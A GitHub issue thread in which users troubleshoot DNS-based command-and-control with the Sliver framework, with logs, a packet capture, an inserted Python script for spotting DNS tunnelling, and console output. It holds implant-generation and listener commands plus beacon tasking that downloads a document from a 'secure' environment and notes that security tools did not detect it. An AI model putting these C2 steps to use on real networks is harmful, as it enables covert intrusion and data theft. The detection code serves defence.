
Unable to establish C2 Session DNS implant or having stability issues with the C2 Beacon DNS implant

Open MelCrypto opened this issue 2 years ago • 9 comments

Hello,

Thanks for any help. After a lot of time spent, I am sure the issue is a damn dot or comma at the wrong place or missing that I just can't see anymore, since I have been at this for hours.

Long story short, my SLIVER client / server setup works fine with ALL C2 except DNS

So far I have :

  - Set up Kali Linux and Ubuntu 22.04 (to validate whether the issue was Kali related)
  - Deployed both Linux instances on AWS and on a home VMware server
  - Deployed a BIND9 Ubuntu server to log the DNS queries sent by the clients
  - Performed packet captures on both ends
  - Created two different DNS zones (one in GoDaddy, one in NameCheap) to validate whether anything special was done by the DNS provider

======================================================================================

From the client, the DNS response is:

No Such name A baakbejmk4e8.blah.com

From the Kali/Sliver server side, the sliver.log file shows:

INFO[2022-09-14T21:40:41Z] [sliver/server/c2/dns.go:362] 'baakbew2q088.c2.blah.com.' is subdomain of '.'
WARN[2022-09-14T21:40:41Z] [sliver/server/c2/dns.go:390] [dns] session not found for id 0 (0)
INFO[2022-09-14T21:40:43Z] [sliver/server/c2/dns.go:362] 'baakbew2q088.c2.blah.com.' is subdomain of '.'
WARN[2022-09-14T21:40:43Z] [sliver/server/c2/dns.go:390] [dns] session not found for id 0 (0)
INFO[2022-09-14T21:40:44Z] [sliver/server/c2/dns.go:362] 'baakbew2q088.c2.blah.com.' is subdomain of '.'
WARN[2022-09-14T21:40:44Z] [sliver/server/c2/dns.go:390] [dns] session not found for id 0 (0)

2.2.2.2 = Kali Linux SLIVER server
1.1.1.1 = AWS DNS server relaying the DNS queries from the C2 DNS client on the Internet


07:57:33.402255 IP 103.62.51.24.31008 > 2.2.2.2.53: 37361% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:33.402668 IP 2.2.2.2.53 > 103.62.51.24.31008: 37361 NXDomain*- 0/0/0 (55)
07:57:34.438323 IP 1.1.1.1.65385 > 2.2.2.2.53: 27502% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:34.438700 IP 2.2.2.2.53 > 1.1.1.1.65385: 27502 NXDomain*- 0/0/0 (55)
07:57:35.561961 IP 103.62.51.20.44219 > 2.2.2.2.53: 43629 [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:35.562310 IP 2.2.2.2.53 > 103.62.51.20.44219: 43629 NXDomain*- 0/0/0 (55)
07:57:38.026881 IP 103.62.51.24.63425 > 2.2.2.2.53: 8345% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:38.027254 IP 2.2.2.2.53 > 103.62.51.24.63425: 8345 NXDomain*- 0/0/0 (55)
07:57:38.966361 IP 103.62.51.24.14478 > 2.2.2.2.53: 19276 [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:38.966720 IP 2.2.2.2.53 > 103.62.51.24.14478: 19276 NXDomain*- 0/0/0 (55)
07:57:42.271472 IP 103.62.51.20.54662 > 2.2.2.2.53: 30161% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:42.271853 IP 2.2.2.2.53 > 103.62.51.20.54662: 30161 NXDomain*- 0/0/0 (55)
07:57:43.306301 IP 1.1.1.1.51511 > 2.2.2.2.53: 54663% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:43.306702 IP 2.2.2.2.53 > 1.1.1.1.51511: 54663 NXDomain*- 0/0/0 (55)

======================================================================================

Lab Install / Steps :

  1. Installed Kali Linux vanilla with net-tools & latest version of SLIVER
  2. Generated C2 Beacon using the following CMD generate --dns c2.blah.com. beacon -N AWS-V1-Blah-DNS-C2-Beacon --save /home/kali/implants-v1/AWS-V1-DNS-Blah-C2-Beacon.exe
  3. Ran the implant on a Windows 10 vanilla laptop
  4. Confirmed that DNS queries are seen on both ends

I am fairly certain that the issue is with the DNS zone now, but for the life of me I cannot figure out where the missing or extra DOT is.

Followed the procedure for C2 DNS at this URL : https://github.com/BishopFox/sliver/wiki/DNS-C2

Before I bang my head against the wall, can someone tell me what I have done wrong ?

Thanks for the help


MelCrypto avatar Sep 14 '22 22:09 MelCrypto
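The capture above is also a useful defender-side artefact: a burst of A queries for the same unusual leading label under one zone, from several resolvers, all answered NXDOMAIN, is exactly the shape DNS monitoring rules look for. The following Python is an added example written for this page; it is not part of this issue or of the Sliver project. It parses the tcpdump lines quoted above, joins each response to its query by client address and transaction id, decides which configured zone a name falls under (a zone of `.` matches every name, which is what the `is subdomain of '.'` log line reports), and summarises NXDOMAIN ratio, client diversity and leading-label entropy per zone. The zone list, thresholds and the `suspicious` rule are assumptions chosen for illustration, not Sliver or BIND behaviour.

```python
import math
import re
from collections import Counter, defaultdict

# tcpdump lines copied verbatim from the capture in this issue (server 2.2.2.2).
CAPTURE = """\
07:57:33.402255 IP 103.62.51.24.31008 > 2.2.2.2.53: 37361% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:33.402668 IP 2.2.2.2.53 > 103.62.51.24.31008: 37361 NXDomain*- 0/0/0 (55)
07:57:34.438323 IP 1.1.1.1.65385 > 2.2.2.2.53: 27502% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:34.438700 IP 2.2.2.2.53 > 1.1.1.1.65385: 27502 NXDomain*- 0/0/0 (55)
07:57:35.561961 IP 103.62.51.20.44219 > 2.2.2.2.53: 43629 [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:35.562310 IP 2.2.2.2.53 > 103.62.51.20.44219: 43629 NXDomain*- 0/0/0 (55)
07:57:38.026881 IP 103.62.51.24.63425 > 2.2.2.2.53: 8345% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:38.027254 IP 2.2.2.2.53 > 103.62.51.24.63425: 8345 NXDomain*- 0/0/0 (55)
07:57:38.966361 IP 103.62.51.24.14478 > 2.2.2.2.53: 19276 [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:38.966720 IP 2.2.2.2.53 > 103.62.51.24.14478: 19276 NXDomain*- 0/0/0 (55)
07:57:42.271472 IP 103.62.51.20.54662 > 2.2.2.2.53: 30161% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:42.271853 IP 2.2.2.2.53 > 103.62.51.20.54662: 30161 NXDomain*- 0/0/0 (55)
07:57:43.306301 IP 1.1.1.1.51511 > 2.2.2.2.53: 54663% [1au] A? baakbew2q088.c2.blah.com. (66)
07:57:43.306702 IP 2.2.2.2.53 > 1.1.1.1.51511: 54663 NXDomain*- 0/0/0 (55)
"""

# Query line: "<ts> IP <src>.<port> > <dst>.<port>: <txid>[+%] [1au] <qtype>? <qname> (<len>)"
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): (?P<txid>\d+)[+%]* "
    r"(?:\[1au\] )?(?P<qtype>[A-Z]+)\? (?P<qname>\S+) \(\d+\)$")
# Response line: "<ts> IP <src>.<port> > <dst>.<port>: <txid>[ <rcode>][flags] an/ns/ar (<len>)";
# tcpdump prints no rcode word for NOERROR, so the rcode group is optional.
RESPONSE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): (?P<txid>\d+)"
    r"(?: (?P<rcode>[A-Za-z]+))?[*$|-]*\s+\d+/\d+/\d+ \(\d+\)$")


def strip_port(addr):
    """'103.62.51.24.31008' -> '103.62.51.24' (tcpdump appends the port as a final dotted field)."""
    return addr.rsplit(".", 1)[0]


def zone_of(qname, zones):
    """Return the configured zone (assumed list, e.g. ['c2.blah.com.']) that qname falls
    under, or None. A zone of '.' matches everything, mirroring the log line above."""
    for zone in zones:
        if zone == "." or qname == zone or qname.endswith("." + zone):
            return zone
    return None


def leading_label(qname, zone):
    """Labels left once the zone suffix is removed; with zone '.' nothing is removed."""
    if zone == ".":
        return qname.rstrip(".")
    return qname[: -len(zone)].rstrip(".")


def shannon_entropy(s):
    """Bits per character of the label; random-looking labels score high."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def summarise(capture, zones, nxdomain_ratio=0.8, min_queries=5):
    """Join responses to queries by (client, txid) and report per-zone features."""
    pending = {}  # (client, txid) -> zone
    stats = defaultdict(lambda: {"queries": 0, "responses": 0, "nxdomain": 0,
                                 "clients": set(), "labels": set()})
    for line in capture.splitlines():
        m = QUERY_RE.match(line)
        if m:
            zone = zone_of(m["qname"], zones)
            if zone is None:
                continue
            client = strip_port(m["src"])
            pending[(client, m["txid"])] = zone
            s = stats[zone]
            s["queries"] += 1
            s["clients"].add(client)
            s["labels"].add(leading_label(m["qname"], zone))
            continue
        m = RESPONSE_RE.match(line)
        if m:
            zone = pending.get((strip_port(m["dst"]), m["txid"]))
            if zone is None:
                continue
            stats[zone]["responses"] += 1
            if m["rcode"] == "NXDomain":
                stats[zone]["nxdomain"] += 1
    report = {}
    for zone, s in stats.items():
        ratio = s["nxdomain"] / s["responses"] if s["responses"] else 0.0
        report[zone] = {
            "queries": s["queries"],
            "responses": s["responses"],
            "nxdomain_ratio": ratio,
            "distinct_clients": len(s["clients"]),
            "distinct_labels": len(s["labels"]),
            "mean_label_entropy": sum(map(shannon_entropy, s["labels"])) / len(s["labels"]),
            # Illustrative rule, not a vendor threshold: sustained NXDOMAIN under one zone.
            "suspicious": s["queries"] >= min_queries and ratio >= nxdomain_ratio,
        }
    return report


if __name__ == "__main__":
    for zone, r in summarise(CAPTURE, ["c2.blah.com."]).items():
        print(zone, r)
```

On this capture the zone `c2.blah.com.` shows 7 queries from 3 distinct clients, every one answered NXDOMAIN, with a single repeated label. A real monitoring rule would watch the same features over a longer window (a tunnel that is working produces many distinct high-entropy labels rather than one repeated label), which is why the entropy and distinct-label counts are reported alongside the NXDOMAIN ratio.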

Try generating an implant with the --debug flag and see if it shows any errors, you may also want to increase the verbosity of the server-side logs in the server config file. From a glance it looks right, but we may be missing something simple that the logs will reveal.

moloch-- avatar Sep 15 '22 16:09 moloch--

Oh, make sure to specify the full domain when you start the dns listener, e.g.

dns --domains c2.blah.com.

moloch-- avatar Sep 15 '22 16:09 moloch--

Hey moloch, thanks for the quick reply,

Was able to generate WAY more debug information this time around, thanks for the tip of the --domain flag

Can't seem to find what level of log verbosity you wish; it is set at 4 currently. Let me know what you need it at and I will go through the testing sequence.

If you can reply back with any request within the next 8 hrs I can provide more debug, after that, I will be offsite for 7 days and will be able to provide you anything you need in 8 days from now


Starting the DNS listener with the --domains flag has produced some very different and interesting results and outputs, please find below a few observations

1- Main difference is that with this additional flag, the C2 Sever now responds to DNS queries received from the remote implant

2- Not only does the C2 server respond, but I am now able to see SESSION advertisements on the console, however, they do not last more than a second or so but that has not happened before.

3- When I start the listener with the --domains flag using a C2 debug beacon implant, I see the beacon register with the console but when I want to view the active sessions it is never shown as an "ALIVE" sessions or shown at all for that matter

4- When I start the listener with the --domains flag using a C2 debug session implant, I see the session register super quick but it goes from "ALIVE" to "DEAD" within seconds

Attaching redacted debug files from both BEACON and SESSION testing done just now

DEBUG files from the Sessions testing:
Debug-Sliver-Session-Client-Blah-001.txt - What was seen on the Sliver-Server console
Debug-Sliver-Session-Server-Blah-001.txt - Output from tail -f .sliver/logs/sliver.log
Debug-Sliver-Session-Client-Blah-001.txt - Output from the Windows Command Prompt box seen

DEBUG files from the Beacons testing:
Debug-Sliver-Beacon-Client-Blah-001.txt - What was seen on the Sliver-Server console
Debug-Sliver-Beacon-Server-Blah-001.txt - Output from tail -f .sliver/logs/sliver.log
Debug-Sliver-Beacon-Server-Console-Blah-001.txt - Output from the Windows Command Prompt box seen


MelCrypto avatar Sep 15 '22 22:09 MelCrypto

Hey Moloch, Additional observations

SESSION
1- Non-debug session implant connects to the C2 server and registers to the console
2- Goes from ALIVE to DEAD within 2-5 seconds

BEACON
1- Non-debug beacon implant connects to the C2 server and seems to remain connected

2- Sent a few tasks (whoami, ifconfig) and they get registered

3- But the tasks don't seem to be sent even after a few check-ins

2a6f562b aws-v1-blah-dns-c2-beacon 0/3 dns n/a DESKTOP-XXXXX User windows/amd64 Fri Sep 16 08:44:55 AEST 2022 (9s ago) Fri Sep 16 08:46:01 AEST 2022 (in 57s)

MelCrypto avatar Sep 15 '22 22:09 MelCrypto

Did some DNS experiments in a lab and also had some problems, but not nearly as severe as yours. Beacons worked perfectly. Sessions came in but died within seconds or minutes. However, they were usable, did some ls and whoami and got results.

Mind sending me your exact Sliver version (mine was v1.5.16 - 140c47e163541340295d3f2b530fe800eccf7156)? I could try with yours and see if I get errors similar to those you describe above. If not, the problem must be the environment (mine is a pure lab env, only VMs, probably not too much packet loss; see here for details).

DominicBreuker avatar Sep 23 '22 21:09 DominicBreuker

Hello Moloch ,

I am now back onsite and have re-imaged both the AWS and VMware labs, running all of the latest Kali, Sliver and Linux packages, and I am happy to report that I am now running a very stable C2 DNS beacon infra where everything works very well. I was able to send out all types of commands and deploy Armory payloads; in general the C2 DNS beacon is very stable and effective. I need to point out that in DEBUG mode the C2 beacon missed a few tasks, which I thought was related to my initial problem, but once I removed the DEBUG flag the C2 DNS beacon didn't miss a beat and purred like a kitten. C2 DNS sessions are still an issue and consistently die a few seconds after establishing with the SLIVER server; happy to provide debugs of anything you need to have this looked at and addressed.

This environment will be up and running for some time, so happy to provide any debug information or run any kind of test you need. I will be testing out the Linux and MAC implants in the coming days / weeks, so shout out if you need / want anything to help get this AMAZING C2 framework even better.

Wanted to share some thanks to @DominicBreuker for the well-documented website related to Sliver; it helped me fine-tune some parts of my infrastructure, so kudos to you. I will be going through the Armory in great detail in the coming days / weeks, so happy to share some findings with you if you are interested. You should find a way to get your site better indexed with search engines; when I looked for help, I never saw it in my search results.

All in all, wanted to say that SLIVER is just AMAZING and for now free, so, it is a great opportunity to learn about C2 and ways to use, detect, prevent, isolate C2 tech in general.

Cheers @moloch-- , keep up the good work and let me know if you need anything ?

MelCrypto avatar Sep 27 '22 22:09 MelCrypto

Hello Moloch,

Lab environment is still very stable across the Internet with minimal security controls at each end,

We have moved the DNS beacons inside a more restrictive environment and the beacon remains [ALIVE] for days. We were able to issue a few basic commands (whoami, ifconfig, pwd) in the first 24 hrs, but since then any commands sent to the beacon are registered as SENT / COMPLETED but the C2 DNS beacon never provides any output or payload from or to the secure environment (multiple reboots of the client were done and different hashes of the binary were executed).

We cannot find any traces of security control blocks related to this C2 in any of the security systems observed in the secure environment while the beacon remains [ALIVE].

Let me know what debug information you need to help out with this ?

sliver > beacons

ID         Name                           Transport   Username          Operating System   Last Check-In   Next Check-In
========== ============================== =========== ================= ================== =============== ===============
387b48c7   prod-aws-Blah-dns-c2-beacon    dns         SECURE\User       windows/amd64      58s ago         31s

sliver > use

? Select a session or beacon: BEACON 387b48c7 prod-aws-Blah-dns-c2-beacon n/a HOST SECURE\User windows/amd64
[*] Active beacon prod-aws-Blah-dns-c2-beacon (387b48c7-3f40-4987-96ef-68125f5fffbf)

sliver (prod-aws-Blah-dns-c2-beacon) > upload /home/kali/non-ORG-Word.docx

[*] Tasked beacon prod-aws-Blah-dns-c2-beacon (fbd505f7)

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID         State     Message Type   Created                          Sent   Completed
========== ========= ============== ================================ ====== ===========
fbd505f7   pending   Upload         Wed, 05 Oct 2022 10:18:13 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > download ORG-Word.docx

[*] Tasked beacon prod-aws-Blah-dns-c2-beacon (c536ce4f)

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID         State   Message Type   Created                          Sent                             Completed
========== ======= ============== ================================ ================================ ===========
c536ce4f   sent    Download       Wed, 05 Oct 2022 10:18:32 AEDT   Wed, 05 Oct 2022 10:19:25 AEDT
fbd505f7   sent    Upload         Wed, 05 Oct 2022 10:18:13 AEDT   Wed, 05 Oct 2022 10:18:17 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > pwd

[*] Tasked beacon prod-aws-Blah-dns-c2-beacon (39c5f173)

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID         State     Message Type   Created                          Sent                             Completed
========== ========= ============== ================================ ================================ ===========
39c5f173   pending   Pwd            Wed, 05 Oct 2022 10:21:30 AEDT
c536ce4f   sent      Download       Wed, 05 Oct 2022 10:18:32 AEDT   Wed, 05 Oct 2022 10:19:25 AEDT
fbd505f7   sent      Upload         Wed, 05 Oct 2022 10:18:13 AEDT   Wed, 05 Oct 2022 10:18:17 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID         State   Message Type   Created                          Sent                             Completed
========== ======= ============== ================================ ================================ ===========
39c5f173   sent    Pwd            Wed, 05 Oct 2022 10:21:30 AEDT   Wed, 05 Oct 2022 10:21:52 AEDT
c536ce4f   sent    Download       Wed, 05 Oct 2022 10:18:32 AEDT   Wed, 05 Oct 2022 10:19:25 AEDT
fbd505f7   sent    Upload         Wed, 05 Oct 2022 10:18:13 AEDT   Wed, 05 Oct 2022 10:18:17 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > beacons

ID         Name                           Transport   Username          Operating System   Last Check-In   Next Check-In
========== ============================== =========== ================= ================== =============== ===============
387b48c7   prod-aws-Blah-dns-c2-beacon    dns         SECURE\User       windows/amd64      45s ago         30s

sliver (prod-aws-Blah-dns-c2-beacon) >

MelCrypto avatar Oct 04 '22 23:10 MelCrypto

Hi @MelCrypto and @DominicBreuker, I'm trying to reproduce DNS tunneling in my lab, but whenever I execute the implant on the Windows target I don't see any answer from my Sliver; there is no communication established! I created my DNS FQDN in Dynu and opened a question here: #975. It seems both of you have more experience with Sliver DNS, could you help me? Do I have to change some configuration in my Linux? Change some BIND configuration?

p3tr0v avatar Oct 31 '22 02:10 p3tr0v

I was facing the same issues as people in this issue that my beacon died after only a few seconds or one or two commands. The recommendation in #718 to force a resolv.conf completely fixed all timeout issues for me. Hope it helps someone else.

parzel avatar Feb 17 '23 09:02 parzel